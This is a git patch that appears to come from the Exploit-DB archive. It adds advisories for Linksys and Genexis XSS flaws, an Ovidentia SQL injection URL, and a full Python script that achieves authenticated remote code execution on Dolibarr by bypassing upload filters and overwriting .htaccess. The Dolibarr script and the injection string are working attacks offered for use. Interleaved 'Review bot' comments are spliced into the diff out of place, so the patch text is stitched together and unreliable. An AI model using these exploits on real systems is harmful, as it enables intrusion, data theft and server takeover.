From 06a83531de693bfac34ce9dcefdd10507637e1d4 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 26 Mar 2021 05:01:58 +0000
Subject: [PATCH] DB: 2021-03-26

4 changes to exploits/shellcodes

Ovidentia 6 - 'id' SQL injection (Authenticated)
Linksys EA7500 2.0.8.194281 - Cross-Site Scripting
Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)
---
 exploits/hardware/webapps/49708.txt | 23 +++
 exploits/hardware/webapps/49709.txt | 20 +++
 exploits/php/webapps/49707.txt | 7 +
 exploits/php/webapps/49711.py | 216 ++++++++++++++++++++++++++++
 files_exploits.csv | 4 +
 5 files changed, 270 insertions(+)
 create mode 100644 exploits/hardware/webapps/49708.txt
 create mode 100644 exploits/hardware/webapps/49709.txt
 create mode 100644 exploits/php/webapps/49707.txt
 create mode 100755 exploits/php/webapps/49711.py

diff --git a/exploits/hardware/webapps/49708.txt b/exploits/hardware/webapps/49708.txt
new file mode 100644
index 000000000..e8f4691f0
--- /dev/null
+++ b/exploits/hardware/webapps/49708.txt
@@ -0,0 +1,23 @@
+# Exploit Title: Linksys EA7500 2.0.8.194281 - Cross-Site Scripting
+# Date: 3/24/21
+# Exploit Author: MiningOmerta
+# Vendor Homepage: https://www.linksys.com/
+# Version: EA7500 Firmware Version: 2.0.8.194281
+# CVE: CVE-2012-6708
+# Tested On: Linksys EA7500 (jQuery version 1.7.1)
+
+# Cross-Site Scripting Vulnerability on modern versions of Linksys Smart-Wifi home routers.
+# Caused by outdated jQuery(strInput) version : <= 1.7.1 (Fixed in version 1.9.0)
+# Credit also to Reddit user michael1026
+
+###
+POC
+###
+
+1. When logging into the router (http://LHOST or http://LHOST:10080), choose "Click Here"
+ next to "Dont Have an Account? " or Choose "click here" after "To login with your Linksys Smart Wi-Fi account",
+ you will be redirected with a login prompt with both Email Address and Password forms.
+
+2. Make your email address "" without the double quotes.
+
+3. Payload will be triggered when mouse is clicked anywhere within the Email Address form box or when form is submitted.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49709.txt b/exploits/hardware/webapps/49709.txt
new file mode 100644
index 000000000..3420844c5
--- /dev/null
+++ b/exploits/hardware/webapps/49709.txt
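Review bot: The advisory names the root cause (jQuery 1.7.1 `jQuery(strInput)`, CVE-2012-6708, fixed in jQuery 1.9.0) but carries no fix line, which leaves a reader to infer the remediation from the credit comment; add `# Fix: upgrade the bundled jQuery to 1.9.0 or later` after the `# Tested On:` line. The `# Date: 3/24/21` field also uses a different format from the other advisories in this commit and from the 2021-03-25 date recorded for it in files_exploits.csv; `# Date: 2021-03-24` would align them. Step 2 of the POC is unreadable as published here, since the quoted value between the double quotes is empty in this copy.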
@@ -0,0 +1,20 @@
+# Exploit Title: Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting
+# Date: 03/25/2020
+# Exploit Author: Jithin KS
+# Vendor Homepage: https://www.gxgroup.eu/ont-products/
+# Version: Platinum-4410 Software version - P4410-V2-1.31A
+# Tested on: Windows 10
+# Author Contact: hhttps://twitter.com/jithinks_8
+
+Vulnerability Details
+======================
+Genexis Platinum-4410 Home Gateway Unit is vulnerable to stored XSS in the "start_addr" parameter. This could allow attackers to perform malicious action in which the XSS popup will affect all privileged users.
+
+How to reproduce
+===================
+1. Login to the firmware as any user
+2. Navigate to Manage tab--> Security Management
+3. Enter any valid value in Start Source Address and fill all other fields. Click Add.
+4. Capture this request in Burp Suite. Enter payload in "start_addr" text box and forward the request.
+5. Relogin as any user and again navigate to Manage tab--> Security Management
+6. Observe the XSS popup showing persistent XSS
\ No newline at end of file
diff --git a/exploits/php/webapps/49707.txt b/exploits/php/webapps/49707.txt
new file mode 100644
index 000000000..90f138c44
--- /dev/null
+++ b/exploits/php/webapps/49707.txt
@@ -0,0 +1,7 @@
+# Exploit Title: Ovidentia 6 - 'id' SQL injection (Authenticated)
+# Exploit Author: Felipe Prates Donato (m4ud)
+# Vendor Homepage: http://www.ovidentia.org
+# Version: 6
+# DORK : "Powered by Ovidentia"
+
+http://Site/ovidentia/index.php?tg=delegat&idx=mem&id=1 UNION Select (select group_concat(TABLE_NAME,":",COLUMN_NAME,"\r\n") from information_Schema.COLUMNS where TABLE_SCHEMA = 'mysql'),2--
\ No newline at end of file
diff --git a/exploits/php/webapps/49711.py b/exploits/php/webapps/49711.py
new file mode 100755
index 000000000..5069f13ec
--- /dev/null
+++ b/exploits/php/webapps/49711.py
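Review bot: `# Date: 03/25/2020` conflicts with the 2021-03-25 date under which files_exploits.csv indexes this entry in the same commit, so the year is most likely a typo; `# Date: 03/25/2021`. The `# Author Contact:` line has a doubled scheme, `hhttps://`, which should read `https://twitter.com/jithinks_8`. The write-up also gives no fixed firmware version or vendor reference beyond the product page, so a reader cannot tell whether P4410-V2-1.31A is the last affected build; a `# Fix:` or "Not fixed at time of publication" line would close that gap.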
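Review bot: The advisory has no `# Date:` line even though the other three files in this commit carry one and files_exploits.csv records it as 2021-03-25; add `# Date: 2021-03-25` after the title. `# Version: 6` names a major branch only and there is no vendor fix reference, so a defender cannot tell from the file which 6.x releases are affected or whether a patched release exists; state the tested point release and, if known, the fixed one.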
@@ -0,0 +1,216 @@ +# Exploit Title: Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) +# Date: 16/06/2020 +# Exploit Author: Andrea Gonzalez +# Vendor Homepage: https://www.dolibarr.org/ +# Software Link: https://github.com/Dolibarr/dolibarr +# Version: Prior to 11.0.5 +# Tested on: Debian 9.12 +# CVE : CVE-2020-14209 + +#!/usr/bin/python3 + +# Choose between 3 types of exploitation: extension-bypass, file-renaming or htaccess. If no option is selected, all 3 methods are tested. + +import re +import sys +import random +import string +import argparse +import requests +import urllib.parse +from urllib.parse import urlparse + +session = requests.Session() +base_url = "http://127.0.0.1/htdocs/" +documents_url = "http://127.0.0.1/documents/" +proxies = {} +user_id = -1 + +class bcolors: + BOLD = '\033[1m' + HEADER = '\033[95m' + OKBLUE = '\033[94m' + OKGREEN = '\033[92m' + WARNING = '\033[93m' + FAIL = '\033[91m' + ENDC = '\033[0m' + +def printc(s, color): + print(f"{color}{s}{bcolors.ENDC}") + +def read_args(): + parser = argparse.ArgumentParser(description='Dolibarr exploit - Choose one or more methods (extension-bypass, htaccess, file-renaming). 
If no method is chosen, every method is tested.') + parser.add_argument('base_url', metavar='base_url', help='Dolibarr base URL.') + parser.add_argument('-d', '--documents-url', dest='durl', help='URL where uploaded documents are stored (default is base_url/../documents/).') + parser.add_argument('-c', '--command', dest='cmd', default="id", help='Command to execute (default "id").') + parser.add_argument('-x', '--proxy', dest='proxy', help='Proxy to be used.') + parser.add_argument('--extension-bypass', dest='fbypass', action='store_true', + default=False, + help='Files with executable extensions are uploaded trying to bypass the file extension blacklist.') + parser.add_argument('--file-renaming', dest='frenaming', action='store_true', + default=False, + help='A PHP script is uploaded and .php extension is added using file renaming function.') + parser.add_argument('--htaccess', dest='htaccess', action='store_true', + default=False, + help='Apache .htaccess file is uploaded so files with .noexe extension can be executed as a PHP script.') + required = parser.add_argument_group('required named arguments') + required.add_argument('-u', '--user', help='Username', required=True) + required.add_argument('-p', '--password', help='Password', required=True) + return parser.parse_args() + +def error(s, end=False): + printc(s, bcolors.HEADER) + if end: + sys.exit(1) + +""" + Returns user id +""" +def login(user, password): + data = { + "actionlogin": "login", + "loginfunction": "loginfunction", + "username": user, + "password": password + } + login_url = urllib.parse.urljoin(base_url, "index.php") + r = session.post(login_url, data=data, proxies=proxies) + try: + regex = re.compile(r"user/card.php\?id=(\d+)") + match = regex.search(r.text) + return int(match.group(1)) + except Exception as e: + #error(e) + return -1 + +def upload(filename, payload): + files = { + "userfile": (filename, payload), + } + data = { + "sendit": "Send file" + } + headers = { + "Referer": base_url + 
} + upload_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(upload_url, files=files, headers=headers, data=data, proxies=proxies) + +def delete(filename): + data = { + "action": "confirm_deletefile", + "confirm": "yes", + "urlfile": filename + } + headers = { + "Referer": base_url + } + delete_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(delete_url, headers=headers, data=data, proxies=proxies) + +def rename(filename, new_filename): + data = { + "action": "renamefile", + "modulepart": "user", + "renamefilefrom": filename, + "renamefileto": new_filename, + "renamefilesave": "Save" + } + headers = { + "Referer": base_url + } + rename_url = urllib.parse.urljoin(base_url, "user/document.php?id=%d" % user_id) + session.post(rename_url, headers=headers, data=data, proxies=proxies) + +def test_payload(filename, payload, query, headers={}): + file_url = urllib.parse.urljoin(documents_url, "users/%d/%s?%s" % (user_id, filename, query)) + r = session.get(file_url, headers=headers, proxies=proxies) + if r.status_code != 200: + error("Error %d %s" % (r.status_code, file_url)) + elif payload in r.text: + error("Non-executable %s" % file_url) + else: + printc("Payload was successful! 
%s\nOutput: %s" % (file_url, r.text.strip()), bcolors.OKGREEN) + return True + return False + +def get_random_filename(): + return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)) + +def upload_executable_file_php(payload, query): + php_extensions = [".php", ".pht", ".phpt", ".phar", ".phtml", ".php3", ".php4", ".php5", ".php6", ".php7"] + random_filename = get_random_filename() + b = False + for extension in php_extensions: + filename = random_filename + extension + upload(filename, payload) + if test_payload(filename, payload, query): + b = True + return b + +def upload_executable_file_ssi(payload, command): + filename = get_random_filename() + ".shtml" + upload(filename, payload) + return test_payload(filename, payload, '', headers={'ACCEPT': command}) + +def upload_and_rename_file(payload, query): + filename = get_random_filename() + ".php" + upload(filename, payload) + rename(filename + ".noexe", filename) + return test_payload(filename, payload, query) + +def upload_htaccess(payload, query): + filename = get_random_filename() + ".noexe" + upload(filename, payload) + filename_ht = get_random_filename() + ".htaccess" + upload(filename_ht, "AddType application/x-httpd-php .noexe\nAddHandler application/x-httpd-php .noexe\nOrder deny,allow\nAllow from all\n") + delete(".htaccess") + rename(filename_ht, ".htaccess") + return test_payload(filename, payload, query) + + +if __name__ == "__main__": + args = read_args() + base_url = args.base_url if args.base_url[-1] == '/' else args.base_url + '/' + documents_url = args.durl if args.durl else urllib.parse.urljoin(base_url, "../documents/") + documents_url = documents_url if documents_url[-1] == '/' else documents_url + '/' + user = args.user + password = args.password + payload = "" + payload_ssi = '' + command = args.cmd + query = "cmd=%s" % command + if args.proxy: + proxies = {"http": args.proxy, "https": args.proxy} + + user_id = login(user, password) + if user_id < 0: + 
error("Login error", True) + printc("Successful login, user id found: %d" % user_id, bcolors.OKGREEN) + print('-' * 30) + if not args.fbypass and not args.frenaming and not args.htaccess: + args.fbypass = args.frenaming = args.htaccess = True + + if args.fbypass: + printc("Trying extension-bypass method\n", bcolors.BOLD) + b = upload_executable_file_php(payload, query) + b = upload_executable_file_ssi(payload_ssi, command) or b + if b: + printc("\nextension-bypass was successful", bcolors.OKBLUE) + else: + printc("\nextension-bypass was not successful", bcolors.WARNING) + print('-' * 30) + if args.frenaming: + printc("Trying file-renaming method\n", bcolors.BOLD) + if upload_and_rename_file(payload, query): + printc("\nfile-renaming was successful", bcolors.OKBLUE) + else: + printc("\nfile-renaming was not successful", bcolors.WARNING) + print('-' * 30) + if args.htaccess: + printc("Trying htaccess method\n", bcolors.BOLD) + if upload_htaccess(payload, query): + printc("\nhtaccess was successful", bcolors.OKBLUE) + else: + printc("\nhtaccess was not successful", bcolors.WARNING) + print('-' * 30) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 439bfc307..4bad37e64 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
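Review bot: The `#!/usr/bin/python3` shebang sits on line 10, after the `# Exploit Title:` header block, so it has no effect and the `100755` mode set on the new file buys nothing; a shebang must be the first line, `#!/usr/bin/python3`, with the header comments below it. The `--htaccess` path in `upload_htaccess` calls `delete(".htaccess")` before renaming its own upload into place, which discards whatever `.htaccess` the target's `documents/users/<id>/` directory already had, and none of the three methods removes the files it uploads; the argparse help text for `--htaccess` should say the directory is left modified so a tester knows what to restore afterwards. `login` wraps the regex match in `except Exception` with the `error(e)` call commented out, so a changed page layout and a bad password both surface as the same "Login error"; narrowing it to `except AttributeError:` and reporting the status code would make the failure diagnosable. `test_payload` declares `headers={}` as a mutable default; it is never mutated here, but `headers=None` with a fallback is the safer idiom.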
@@ -43174,6 +43174,7 @@ id,file,description,date,author,type,platform,port
 48390,exploits/php/webapps/48390.txt,"School ERP Pro 1.0 - 'es_messagesid' SQL Injection",2020-04-28,Besim,webapps,php,
 48392,exploits/php/webapps/48392.txt,"School ERP Pro 1.0 - Remote Code Execution",2020-04-28,Besim,webapps,php,
 48393,exploits/php/webapps/48393.py,"Open-AudIT Professional 3.3.1 - Remote Code Execution",2020-04-29,Askar,webapps,php,
+49707,exploits/php/webapps/49707.txt,"Ovidentia 6 - 'id' SQL injection (Authenticated)",2021-03-25,"Felipe Prates Donato",webapps,php,
 48394,exploits/php/webapps/48394.txt,"School ERP Pro 1.0 - Arbitrary File Read",2020-04-29,Besim,webapps,php,
 48395,exploits/ios/webapps/48395.txt,"Easy Transfer 1.7 for iOS - Directory Traversal",2020-04-29,Vulnerability-Lab,webapps,ios,
 48399,exploits/php/webapps/48399.txt,"hits script 1.0 - 'item_name' SQL Injection",2020-04-29,SajjadBnd,webapps,php,
@@ -43888,4 +43889,7 @@ id,file,description,date,author,type,platform,port
 49699,exploits/php/webapps/49699.txt,"MyBB 1.8.25 - Poll Vote Count SQL Injection",2021-03-23,SivertPL,webapps,php,
 49700,exploits/php/webapps/49700.txt,"Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS",2021-03-23,"Jitendra Kumar Tripathi",webapps,php,
 49705,exploits/multiple/webapps/49705.py,"Codiad 2.8.4 - Remote Code Execution (Authenticated)",2021-03-23,WangYihang,webapps,multiple,
+49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
+49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
+49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,